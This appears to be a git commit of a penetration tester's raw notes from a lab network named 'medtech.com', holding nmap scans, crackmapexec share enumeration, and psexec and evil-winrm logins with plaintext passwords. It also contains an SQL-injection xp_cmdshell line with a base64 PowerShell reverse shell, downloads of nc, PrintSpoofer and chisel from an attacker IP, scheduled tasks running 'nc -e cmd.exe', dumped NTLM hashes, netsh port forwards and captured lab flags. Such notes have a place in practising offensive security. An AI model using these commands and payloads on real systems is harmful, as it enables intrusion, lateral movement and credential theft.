first commit

This commit is contained in:
2025-11-21 17:17:42 +01:00
commit 4cad18c2a5
285 changed files with 122106 additions and 0 deletions
+10
View File
@@ -0,0 +1,10 @@
**172.16.229.10**
**172.16.229.11**
**172.16.229.12**
**172.16.229.13**
**172.16.229.14**
**172.16.229.82**
**172.16.229.83**
**192.168.229.120**
**192.168.229.121**
**192.168.229.122**
+210
View File
@@ -0,0 +1,210 @@
Nmap scan report for 172.16.152.11
Host is up (0.055s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2.time:
| date: 2024.06.25T10:45:43
|_ start_date: N/A
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FILES02, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:f7:cb (VMware)
|_clock-skew: 1s
Nmap scan report for 172.16.152.12
Host is up (0.063s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024.06.25T10:46:22+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: MEDTECH
| NetBIOS_Domain_Name: MEDTECH
| NetBIOS_Computer_Name: DEV04
| DNS_Domain_Name: medtech.com
| DNS_Computer_Name: DEV04.medtech.com
| DNS_Tree_Name: medtech.com
| Product_Version: 10.0.20348
|_ System_Time: 2024.06.25T10:45:42+00:00
| ssl-cert: Subject: commonName=DEV04.medtech.com
| Not valid before: 2024.04.16T20:19:52
|_Not valid after: 2024.10.16T20:19:52
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2.time:
| date: 2024.06.25T10:45:43
|_ start_date: N/A
|_nbstat: NetBIOS name: DEV04, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:7f:da (VMware)
Nmap scan report for 172.16.152.13
Host is up (0.064s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: PROD01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:d1:c2 (VMware)
|_clock-skew: 1s
| smb2.time:
| date: 2024.06.25T10:45:43
|_ start_date: N/A
Nmap scan report for 172.16.152.14
Host is up (0.052s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0.
| ssh-hostkey:
| 3072 eb:0e:77:7c:69:f2:4a:a5:65:2a:1c:ec:ec:6e:79:19 (RSA)
|_ 256 5f:4f:29:47:7a:14:65:4d:bc:f3:74:40:a7:45:7e:94 (ED25519.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Post-scan script results:
| clock-skew:
| 1s:
| 172.16.152.11
| 172.16.152.12
|_ 172.16.152.13
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 4 IP addresses (4 hosts up) scanned in 66.73 seconds
Nmap scan report for 172.16.152.82
Host is up (0.064s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=CLIENT01.medtech.com
| Not valid before: 2024.04.16T21:31:12
|_Not valid after: 2024.10.16T21:31:12
| rdp-ntlm-info:
| Target_Name: MEDTECH
| NetBIOS_Domain_Name: MEDTECH
| NetBIOS_Computer_Name: CLIENT01
| DNS_Domain_Name: medtech.com
| DNS_Computer_Name: CLIENT01.medtech.com
| DNS_Tree_Name: medtech.com
| Product_Version: 10.0.22000
|_ System_Time: 2024.06.25T10:54:27+00:00
|_ssl-date: 2024.06.25T10:55:07+00:00; +2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: CLIENT01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:34:40 (VMware)
| smb2.time:
| date: 2024.06.25T10:54:27
|_ start_date: N/A
Nmap scan report for 172.16.152.83
Host is up (0.064s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: CLIENT02, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:3f:90 (VMware)
|_clock-skew: 1s
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2.time:
| date: 2024.06.25T10:54:27
|_ start_date: N/A
Post-scan script results:
| clock-skew:
| 1s:
| 172.16.152.82
|_ 172.16.152.83
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 2 IP addresses (2 hosts up) scanned in 74.33 seconds
---smb----
➜ websrv crackmapexec smb 172.16.152.10.83 -u joe -d medtech.com -p "Flowers1" --shares
SMB 172.16.152.10 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01. (domain:medtech.com) (signing:True) (SMBv1:False)
SMB 172.16.152.83 445 CLIENT02 [*] Windows 11 Build 22000 x64 (name:CLIENT02. (domain:medtech.com) (signing:False) (SMBv1:False)
SMB 172.16.152.12 445 DEV04 [*] Windows Server 2022 Build 20348 x64 (name:DEV04. (domain:medtech.com) (signing:False) (SMBv1:False)
SMB 172.16.152.11 445 FILES02 [*] Windows Server 2022 Build 20348 x64 (name:FILES02. (domain:medtech.com) (signing:False) (SMBv1:False)
SMB 172.16.152.82 445 CLIENT01 [*] Windows 11 Build 22000 x64 (name:CLIENT01. (domain:medtech.com) (signing:False) (SMBv1:False)
SMB 172.16.152.13 445 PROD01 [*] Windows Server 2022 Build 20348 x64 (name:PROD01. (domain:medtech.com) (signing:False) (SMBv1:False)
SMB 172.16.152.10 445 DC01 [+] medtech.com\joe:Flowers1
SMB 172.16.152.83 445 CLIENT02 [+] medtech.com\joe:Flowers1
SMB 172.16.152.12 445 DEV04 [+] medtech.com\joe:Flowers1
SMB 172.16.152.11 445 FILES02 [+] medtech.com\joe:Flowers1 (Pwn3d!)
SMB 172.16.152.12 445 DEV04 [+] Enumerated shares
SMB 172.16.152.12 445 DEV04 Share Permissions Remark
SMB 172.16.152.12 445 DEV04 ----- ----------- ------
SMB 172.16.152.12 445 DEV04 ADMIN$ Remote Admin
SMB 172.16.152.12 445 DEV04 C$ Default share
SMB 172.16.152.12 445 DEV04 IPC$ READ Remote IPC
SMB 172.16.152.83 445 CLIENT02 [+] Enumerated shares
SMB 172.16.152.83 445 CLIENT02 Share Permissions Remark
SMB 172.16.152.83 445 CLIENT02 ----- ----------- ------
SMB 172.16.152.83 445 CLIENT02 ADMIN$ Remote Admin
SMB 172.16.152.83 445 CLIENT02 C READ
SMB 172.16.152.83 445 CLIENT02 C$ Default share
SMB 172.16.152.83 445 CLIENT02 IPC$ READ Remote IPC
SMB 172.16.152.83 445 CLIENT02 Windows READ
SMB 172.16.152.10 445 DC01 [+] Enumerated shares
SMB 172.16.152.10 445 DC01 Share Permissions Remark
SMB 172.16.152.10 445 DC01 ----- ----------- ------
SMB 172.16.152.10 445 DC01 ADMIN$ READ Remote Admin
SMB 172.16.152.10 445 DC01 C$ READ,WRITE Default share
SMB 172.16.152.10 445 DC01 IPC$ READ Remote IPC
SMB 172.16.152.10 445 DC01 NETLOGON READ Logon server share
SMB 172.16.152.10 445 DC01 SYSVOL READ Logon server share
SMB 172.16.152.82 445 CLIENT01 [+] medtech.com\joe:Flowers1
SMB 172.16.152.13 445 PROD01 [+] medtech.com\joe:Flowers1
SMB 172.16.152.82 445 CLIENT01 [+] Enumerated shares
SMB 172.16.152.82 445 CLIENT01 Share Permissions Remark
SMB 172.16.152.82 445 CLIENT01 ----- ----------- ------
SMB 172.16.152.82 445 CLIENT01 ADMIN$ Remote Admin
SMB 172.16.152.82 445 CLIENT01 C$ Default share
SMB 172.16.152.82 445 CLIENT01 IPC$ READ Remote IPC
SMB 172.16.152.13 445 PROD01 [+] Enumerated shares
SMB 172.16.152.13 445 PROD01 Share Permissions Remark
SMB 172.16.152.13 445 PROD01 ----- ----------- ------
SMB 172.16.152.13 445 PROD01 ADMIN$ Remote Admin
SMB 172.16.152.13 445 PROD01 C$ Default share
SMB 172.16.152.13 445 PROD01 IPC$ READ Remote IPC
SMB 172.16.152.11 445 FILES02 [+] Enumerated shares
SMB 172.16.152.11 445 FILES02 Share Permissions Remark
SMB 172.16.152.11 445 FILES02 ----- ----------- ------
SMB 172.16.152.11 445 FILES02 ADMIN$ READ,WRITE Remote Admin
SMB 172.16.152.11 445 FILES02 C READ,WRITE
SMB 172.16.152.11 445 FILES02 C$ READ,WRITE Default share
SMB 172.16.152.11 445 FILES02 IPC$ READ Remote IPC
SMB 172.16.152.11 445 FILES02 TEMP READ,WRITE
@@ -0,0 +1,27 @@
Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2024.06.25 12:41 CEST
Nmap scan report for 172.16.152.10
Host is up (0.073s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024.06.25 10:41:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: medtech.com0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: medtech.com0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2.time:
| date: 2024.06.25T10:41:38
|_ start_date: N/A
|_clock-skew: 1s
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:f0:b0 (VMware)
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled and required
@@ -0,0 +1,3 @@
iwr -uri [http://192.168.45.203:8888/](http://192.168.45.198:8888/nc.exe)peas.exe -Outfile peas.exe
@@ -0,0 +1,32 @@
Nmap scan report for 172.16.152.12
Host is up (0.063s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024.06.25T10:46:22+00:00; +2s from scanner time.
| rdp-ntlm-info:
| Target_Name: MEDTECH
| NetBIOS_Domain_Name: MEDTECH
| NetBIOS_Computer_Name: DEV04
| DNS_Domain_Name: medtech.com
| DNS_Computer_Name: DEV04.medtech.com
| DNS_Tree_Name: medtech.com
| Product_Version: 10.0.20348
|_ System_Time: 2024.06.25T10:45:42+00:00
| ssl-cert: Subject: commonName=DEV04.medtech.com
| Not valid before: 2024.04.16T20:19:52
|_Not valid after: 2024.10.16T20:19:52
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2.time:
| date: 2024.06.25T10:45:43
|_ start_date: N/A
|_nbstat: NetBIOS name: DEV04, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:7f:da (VMware)
@@ -0,0 +1,22 @@
Nmap scan report for 172.16.152.11
Host is up (0.055s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2.time:
| date: 2024.06.25T10:45:43
|_ start_date: N/A
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: FILES02, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:f7:cb (VMware)
|_clock-skew: 1s
impacket-psexec medtech.com/joe:Flowers1@172.16.152.11
@@ -0,0 +1 @@
impacket-psexec medtech.com/joe:Flowers1@172.16.152.11
@@ -0,0 +1,18 @@
Nmap scan report for 172.16.152.13
Host is up (0.064s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2.security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: PROD01, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:9e:d1:c2 (VMware)
|_clock-skew: 1s
| smb2.time:
| date: 2024.06.25T10:45:43
|_ start_date: N/A
@@ -0,0 +1 @@
evil-winrm -i 172.16.229.83 -u wario -p "Mushroom\!"
+31
View File
@@ -0,0 +1,31 @@
webpage sql incjection:
' EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQAOQAuADkAMQAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwB0AHIAeQAgAHsAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAIgAuACAAewAgACQAZABhAHQAYQAgAH0AIAAyAD4AJgAxACIAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAgAH0AIABjAGEAdABjAGgAIAB7ACAAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAIgAkAF8AYABuACIAfQA7ACAAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
iwr -uri [http://192.168.45.203:8888/](http://192.168.45.198:8888/nc.exe)PrintSpoofer64.exe -Outfile pf.exe
iwr -uri <http://192.168.45.198:8888/>SharpHound.exe -Outfile SharpHound.exe
iwr -uri [http://192.168.45.203:8888/](http://192.168.45.198:8888/nc.exe)nc.exe -Outfile nc.exe
iwr -uri <http://192.168.45.198:8888/>chisel_1.9.1_windows_amd64 -Outfile chiesel.exe
iwr -uri [http://192.168.45.203:8888/](http://192.168.45.198:8888/nc.exe)agent.exe -Outfile agent.exe
```powershell
schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr "c:\Users\web_svc\ns"
```
`schtasks /create /sc minute /mo 1 /tn "Reverse shell2" /tr "c:\users\sql_svc\nc.exe 10.10.14.56 4242 -e cmd.exe"`
`schtasks /create /s "PC-NAME" /tn "My App" /tr "PATH" /sc minute /mo 1 /u Domain\User /p password`
c:\users\a.hansen\desktop\nc.exe -e cmd.exe 192.168.49.91 4444
invoke-bloodhound -collectionmethod all -domain medtech.com -ldapuser joe -ldappass Flowers1 -zipFileName loot.zip
WEB02$::MEDTECH:1122334455667788:fc9d3e73bbbf28562c0aab342f0f95cc:0101000000000000e8672fa2d7c6da0155d090522781b7bb00000000080030003000000000000000000000000030000052e5b4d9e1d59e5faa306b0417df176ee00305b9b4219ccaccf2330883db92960a00100000000000000000000000000000000000090000000000000000000000
netsh interface portproxy add v4tov4 listenport=3389 listenaddress=**192.168.229.121** connectport=3389 connectaddress=**172.16.229.12**
Accept port forwarding
netsh advfirewall firewall add rule name="port_forward_rdp_3389" protocol=TCP dir=in localip=**192.168.229.121** localport=3389 action=allow
+16
View File
@@ -0,0 +1,16 @@
.120 - proof 08bc777cb68808f3e108c9deabf4d356
.121 - proof X
.122 - local and proof , local: c706420afc060033a3fa790145c13d63 , proof: 0b6373d3cf5d73c4d9b8b1b5eb91fa5f
.10 - proof X
.11 - local and proof local:021d7eec872a5cdf47ee9eb0ac9c3818 , proof:2407ddc3dfc7d6b5b6b8fe72310c18d1
.12 - local and proof
.13 - proof : e482a25771b752775d7f87cd81fe2b3e
.14 - local only cc55f0fad8fec554ded8aee711fdd7c0
.82 - proof ef3e8a45c673b53afb5b0f71e970ceb8
.83 - local and proof local: e9e68c489bc339ef55b5c678e9272b89
, proof: 95d3517b79e3105766cf5624411bf034
dir C:[\](fold XA==)Users
type C:[\](fold XA==)Users/Administrator/Desktop/proof.txt
powershell -c type C:\Users/wario/Desktop/local.txt
powershell -c type C:\Users/Administrator/Desktop/proof.txt
+6
View File
@@ -0,0 +1,6 @@
daisy:abf36048c1cf88f5603381c5128feb8e
toad:5be63a865b65349851c1f11a067a3068
wario:fdf36048c1cf88f5630381c5e38feb8e
goomba:8e9e1516818ce4e54247e71e71b5f436
milana:
+9
View File
@@ -0,0 +1,9 @@
joe:Flower1
wario:Mushroom!
yoshi:Mushroom!
leon:rabbit:)
web01: offsec/century62hisan51
4aaddeed5888f984ee378b15e88529a7